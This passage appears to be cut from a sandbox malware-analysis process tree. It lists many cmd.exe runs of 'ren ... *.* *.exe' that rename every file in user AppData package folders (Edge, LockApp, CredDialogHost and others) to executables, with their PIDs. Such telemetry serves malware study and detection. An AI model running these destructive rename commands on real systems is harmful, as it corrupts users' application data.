        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:2396
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\TempState\*.*" "*.exe"
        5⤵
        
        PID:2348
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:1676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:3908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:2176
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:4152
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\*.*" "*.exe"
        5⤵
        
        PID:4120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AppData\*.*" "*.exe"
        5⤵
        
        PID:4868
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:4608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        5⤵
        
        PID:2900
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:4280
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\*.*" "*.exe"
        5⤵
        
        PID:2152
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:4564
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\TempState\*.*" "*.exe"
        5⤵
        
        PID:3980
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:3988
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:3148
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:1944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:2752
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\*.*" "*.exe"
        5⤵
        
        PID:2344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AppData\*.*" "*.exe"
        5⤵
        
        PID:580
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:3308
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        5⤵
        
        PID:4392
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3388
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:2092
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\*.*" "*.exe"
        5⤵
        
        PID:4720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:920
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\TempState\*.*" "*.exe"
        5⤵
        
        PID:2944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:3624
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:1292
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:1436
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\*.*" "*.exe"
        5⤵
        
        PID:4780
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AppData\*.*" "*.exe"
        5⤵
        
        PID:3084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:2000
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\LocalState\*.*" "*.exe"
        5⤵
        
        PID:3344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:4000
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1256
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\*.*" "*.exe"
        5⤵
        
        PID:464
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:4920
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\TempState\*.*" "*.exe"
        5⤵
        
        PID:2400
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:4972
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:3924
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:4132
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:4376
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\*.*" "*.exe"
        5⤵
        
        PID:3108
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AppData\*.*" "*.exe"
        5⤵
        
        PID:4416
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:2896
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        5⤵
        
        PID:1552
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:4120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\*.*" "*.exe"
        5⤵
        
        PID:4616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:64
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\TempState\*.*" "*.exe"
        5⤵
        
        PID:5112
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:4800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:1096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:1844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\*.*" "*.exe"
        5⤵
        
        PID:4324
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:540
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AppData\*.*" "*.exe"
        5⤵
        
        PID:2124
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:4880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        5⤵
        
        PID:4508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:2084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\*.*" "*.exe"
        5⤵
        
        PID:4988
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:2136
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\TempState\*.*" "*.exe"
        5⤵
        
        PID:3108
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2288
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:4556
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:4276
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:4620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:4932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\*.*" "*.exe"
        5⤵
        
        PID:4632
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AppData\*.*" "*.exe"
        5⤵
        
        PID:836
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:64
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:2856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\LocalState\*.*" "*.exe"
        5⤵
        
        PID:3432
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:4028
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\*.*" "*.exe"
        5⤵
        
        PID:3528
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2716
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:3148
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\TempState\*.*" "*.exe"
        5⤵
        
        PID:2200
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:4316
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:4584
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:4972
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\*.*" "*.exe"
        5⤵
        
        PID:3908
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1636
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AppData\*.*" "*.exe"
        5⤵
        
        PID:4720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:2268
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        5⤵
        
        PID:1540
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:4608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\*.*" "*.exe"
        5⤵
        
        PID:1300
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:2984
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\TempState\*.*" "*.exe"
        5⤵
        
        PID:2584
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:4616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:2336
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:4564
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3988
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:3604
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1876
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\*.*" "*.exe"
        5⤵
        
        PID:4740
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AppData\*.*" "*.exe"
        5⤵
        
        PID:3344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:4176
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4920
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\LocalState\*.*" "*.exe"
        5⤵
        
        PID:1944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:2344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\*.*" "*.exe"
        5⤵
        
        PID:3660
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4376
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:2356
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\TempState\*.*" "*.exe"
        5⤵
        
        PID:2680
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3108
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:4720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:736
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:928
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:4416
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\*.*" "*.exe"
        5⤵
        
        PID:4676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\*.*" "*.exe"
        5⤵
        
        PID:2624
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:4476
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\*.*" "*.exe"
        5⤵
        
        PID:4492
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:392
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\*.*" "*.exe"
        5⤵
        
        PID:4908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:3120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\*.*" "*.exe"
        5⤵
        
        PID:4800
    - - C:\Windows\System32\cmd.exe
        
